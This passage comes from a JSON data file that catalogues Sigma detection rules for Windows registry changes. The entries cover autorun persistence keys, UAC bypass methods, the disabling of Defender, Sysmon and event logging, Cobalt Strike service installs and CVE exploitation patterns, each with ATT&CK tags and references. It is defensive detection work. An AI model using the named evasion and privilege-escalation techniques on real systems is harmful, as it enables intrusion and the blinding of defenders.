"falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", - "value": "WinSock2 Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_winsock2.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", - "value": "Wow6432Node CurrentVersion Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "18f2065c-d36c-464a-a748-bcf909acb2e3", - "value": "Wow6432Node Classes Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "uuid": "480421f9-417f-4d3b-9552-fd2728443ec8", - "value": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", - "uuid": "83314318-052a-4c90-a1ad-660ece38d276", - "value": "Blackbyte Ransomware Registry", - "meta": { - "refs": [ - "https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/01/24", - "filename": "registry_set_blackbyte_ransomware.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Bypasses User Account Control using a fileless method", - "uuid": "46dd5308-4572-4d12-aa43-8938f0184d4f", - "value": "Bypass UAC Using DelegateExecute", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", - "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" - ], - "creation_date": "2022/01/05", - "filename": "registry_set_bypass_uac_using_delegateexecute.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", - "uuid": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", - "value": "Bypass UAC Using Event Viewer", - "meta": { - "refs": [ - "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.010" - ], - "creation_date": "2022/01/05", - "filename": "registry_set_bypass_uac_using_eventviewer.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", - "uuid": "724ea201-6514-4f38-9739-e5973c34f49a", - "value": "Bypass UAC Using SilentCleanup Task", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task", - "https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" - ], - "creation_date": "2022/01/06", - "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", - "uuid": "509e84b9-a71a-40e0-834f-05470369bd1e", - "value": "Changing RDP Port to Non Standard Number", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_rdp_port.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.010" - ], - "creation_date": "2022/01/01", - "filename": "registry_set_change_rdp_port.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Hides the file extension through modification of the registry", - "uuid": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", - "value": "IE Change Domain Zone", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", - "https://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_security_zones.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137" - ], - "creation_date": "2022/01/22", - "filename": "registry_set_change_security_zones.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Administrative scripts" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", - "uuid": "4916a35e-bfc4-47d0-8e25-a003d7067061", - "value": "Disable Sysmon Event Logging Via Registry", - "meta": { - "refs": [ - "https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650", - "https://youtu.be/zSihR3lTf7g", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/07/28", - "filename": "registry_set_change_sysmon_driver_altitude.yml", - "author": "B.Talebi", - "level": "high", - "falsepositive": [ - "Legitimate driver altitude change to hide sysmon" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", - "uuid": "7d9263bd-dc47-4a58-bc92-5474abab390c", - "value": "Change Winevt Event Access Permission Via Registry", - "meta": { - "refs": [ - "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/", - "https://learn.microsoft.com/en-us/windows/win32/api/winevt/", - "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ], - "creation_date": "2022/09/17", - "filename": "registry_set_change_winevt_channelaccess.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", - "uuid": "976dd1f2-a484-45ec-aa1d-0e87e882262b", - "value": "CHM Helper DLL Persistence", - "meta": { - "refs": [ - "https://persistence-info.github.io/Data/htmlhelpauthor.html", - "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chm_persistence.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/21", - "filename": "registry_set_chm_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", - "uuid": "b64a026b-8deb-4c1d-92fd-98893209dff1", - "value": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1133/T1133.md#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1133" - ], - "creation_date": "2021/12/28", - "filename": "registry_set_chrome_extension.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", - "uuid": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", - "value": "CobaltStrike Service Installations in Registry", - "meta": { - "refs": [ - "https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cobaltstrike_service_installs.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" - ], - "creation_date": "2021/06/29", - "filename": "registry_set_cobaltstrike_service_installs.yml", - "author": "Wojciech Lesicki", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", - "uuid": "07743f65-7ec9-404a-a519-913db7118a8d", - "value": "COM Hijack via Sdclt", - "meta": { - "refs": [ - "http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass", - "https://www.exploit-db.com/exploits/47696", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_comhijack_sdclt.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1546", - "attack.t1548" - ], - "creation_date": "2020/09/27", - "filename": "registry_set_comhijack_sdclt.yml", - "author": "Omkar Gudhate", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", - "uuid": "2ff692c2-4594-41ec-8fcb-46587de769e0", - "value": "CrashControl CrashDump Disabled", - "meta": { - "refs": [ - "https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml" - ], - "tags": [ - "attack.t1564", - "attack.t1112" - ], - "creation_date": "2022/02/24", - "filename": "registry_set_crashdump_disabled.yml", - "author": "Tobias Michalski", - "level": "medium", - "falsepositive": [ - "Legitimate disabling of crashdumps" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detect the creation of a service with a service binary located in a suspicious directory", - "uuid": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", - "value": "Service Binary in Suspicious Folder", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/05/02", - "filename": "registry_set_creation_service_susp_folder.yml", - "author": "Florian Roth, frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detect the creation of a service with a service binary located in a uncommon directory", - "uuid": "277dc340-0540-42e7-8efb-5ff460045e07", - "value": "Service Binary in Uncommon Folder", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_uncommon_folder.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/05/02", - "filename": "registry_set_creation_service_uncommon_folder.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the abuse of custom file open handler, executing powershell", - "uuid": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", - "value": "Custom File Open Handler Executes PowerShell", - "meta": { - "refs": [ - "https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/?cmp=30728", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_custom_file_open_handler_powershell_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2022/06/11", - "filename": "registry_set_custom_file_open_handler_powershell_execution.yml", - "author": "CD_R0M_", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", - "uuid": "7ec912f2-5175-4868-b811-ec13ad0f8567", - "value": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", - "meta": { - "refs": [ - "https://windows-internals.com/printdemon-cve-2020-1048/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml" - ], - "tags": [ - "attack.persistence", - "attack.execution", - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2020/05/13", - "filename": "registry_set_cve_2020_1048_new_printer_port.yml", - "author": "EagleEye Team, Florian Roth, NVISO", - "level": "high", - "falsepositive": [ - "New printer port install on host" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "uuid": "32b5db62-cb5f-4266-9639-0fa48376ac00", - "value": "CVE-2021-31979 CVE-2021-33771 Exploits", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", - "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" - ], - "creation_date": "2021/07/16", - "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml", - "author": "Sittikorn S, frack113", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", - "uuid": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", - "value": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)", - "meta": { - "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190", - "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1221" - ], - "creation_date": "2020/05/31", - "filename": "registry_set_cve_2022_30190_msdt_follina.yml", - "author": "Sittikorn S", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence which will get invoked when an application crashes", - "uuid": "9827ae57-3802-418f-994b-d5ecf5cd974b", - "value": "Add Debugger Entry To DbgManagedDebugger For Persistence", - "meta": { - "refs": [ - "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", - "https://github.com/last-byte/PersistenceSniper", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1574" - ], - "creation_date": "2022/08/07", - "filename": "registry_set_dbgmanageddebugger_persistence.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the Setting of Windows Defender Exclusions", - "uuid": "a982fc9c-6333-4ffb-a51d-addb04e8b529", - "value": "Windows Defender Exclusions Added - Registry", - "meta": { - "refs": [ - "https://twitter.com/_nullbind/status/1204923340810543109", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_defender_exclusions.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/07/06", - "filename": "registry_set_defender_exclusions.yml", - "author": "Christian Burkard", - "level": "medium", - "falsepositive": [ - "Administrator actions" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", - "uuid": "9d3436ef-9476-4c43-acca-90ce06bdf33a", - "value": "DHCP Callout DLL Installation", - "meta": { - "refs": [ - "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", - "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" - ], - "creation_date": "2017/05/15", - "filename": "registry_set_dhcp_calloutdll.yml", - "author": "Dimitrios Slamaris", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects disabling Windows Defender Exploit Guard Network Protection", - "uuid": "bf9e1387-b040-4393-9851-1598f8ecfae9", - "value": "Disable Exploit Guard Network Protection on Windows Defender", - "meta": { - "refs": [ - "https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/08/04", - "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", - "uuid": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", - "value": "Disabled Windows Defender Eventlog", - "meta": { - "refs": [ - "https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/07/04", - "filename": "registry_set_disabled_microsoft_defender_eventlog.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects disabling Windows Defender PUA protection", - "uuid": "8ffc5407-52e3-478f-9596-0a7371eafe13", - "value": "Disable PUA Protection on Windows Defender", - "meta": { - "refs": [ - "https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_pua_protection_on_microsoft_defender.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/08/04", - "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml", - "author": "Austin Songer @austinsonger", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects disabling Windows Defender Tamper Protection", - "uuid": "93d298a1-d28f-47f1-a468-d971e7796679", - "value": "Disable Tamper Protection on Windows Defender", - "meta": { - "refs": [ - "https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/08/04", - "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", - "uuid": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", - "value": "Disable Administrative Share Creation at Startup", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.005" - ], - "creation_date": "2022/01/16", - "filename": "registry_set_disable_administrative_share.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects tampering of autologger trace sessions which is a technique used by attackers to disable logging", - "uuid": "f37b4bce-49d0-4087-9f5b-58bffda77316", - "value": "AutoLogger Sessions Tamper", - "meta": { - "refs": [ - "https://twitter.com/MichalKoczwara/status/1553634816016498688", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/08/01", - "filename": "registry_set_disable_autologger_sessions.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", - "uuid": "974515da-6cc5-4c95-ae65-f97f9150ec7f", - "value": "Disable Microsoft Defender Firewall via Registry", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ], - "creation_date": "2022/01/09", - "filename": "registry_set_disable_defender_firewall.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", - "uuid": "e2482f8d-3443-4237-b906-cc145d87a076", - "value": "Disable Internal Tools or Feature in Registry", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", - "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", - 